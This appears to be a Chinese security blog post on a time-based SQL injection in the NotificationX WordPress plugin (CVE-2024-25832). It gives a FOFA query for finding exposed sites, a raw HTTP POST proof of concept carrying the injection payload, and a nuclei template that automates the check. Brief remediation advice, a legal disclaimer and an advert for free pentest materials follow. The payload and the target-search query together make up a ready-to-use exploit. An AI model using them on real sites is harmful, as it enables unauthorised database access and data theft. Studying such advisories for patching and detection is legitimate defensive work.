漏洞描述

WordPress Plugin是一种用于扩展和增强WordPress网站功能的软件插件。WordPress是一种流行的内容管理系统（CMS），它提供了基本的网站功能，如文章发布、页面管理和用户权限控制等。然而，有时候用户需要更多的功能或特定的定制需求，这时就可以使用WordPress Plugin来实现。此产品存在SQL注入漏洞，恶意攻击者可能会利用此漏洞获取服务器的敏感信息，最终导致服务器失陷。

影响版本

WordPress Plugin NotificationX

产品界面

fofa语法

body="/wp-content/plugins/notificationx"

POC

1. POST /wp-json/notificationx/v1/analytics HTTP/1.1
2. Host:
3. Content-Type: application/json
5. {"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

nuclei验证

1. id: CVE-2024-25832
3. info:
4. name: WordPress Plugin SQL注入漏洞(CVE-2024-25832)
5. author: nobody
6. severity: high
7. description: |
8. WordPress Plugin 存在SQL注入漏洞，恶意攻击者可能会利用此漏洞获取服务器的敏感信息，最终导致服务器失陷。
9. impact: |
10. 恶意攻击者可能会利用此漏洞获取服务器的敏感信息
11. remediation: |
12. 升级最新版本，打补丁
13. metadata:
14. verified: true
15. max-request: 3
16. fofa-query: body="/wp-content/plugins/notificationx"
17. tags: CVE-2024-25832,sqli
19. requests:
20. - raw:
21. - |-
22. @timeout:10s
23. POST /wp-json/notificationx/v1/analytics HTTP/1.1
24. Host: {{Hostname}}
25. Content-Type: application/json
27. {"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
29. matchers:
30. - type: dsl
31. condition: and
32. dsl:
33. - "duration>=5"
34. - status_code==200 && contains_all(body,'\{\"success\":true\}')

修复建议

• 建议升级到最新版本或打补丁
• 非必要禁止公网访问或白名单访问

•    申明：本账号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。

  免费领取安全学习资料包！

  渗透工具

  

  技术文档、书籍

   

  

  面试题

  帮助你在面试中脱颖而出

  

  视频

  基础到进阶

  环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等

   

  

  应急响应笔记

  

  学习路线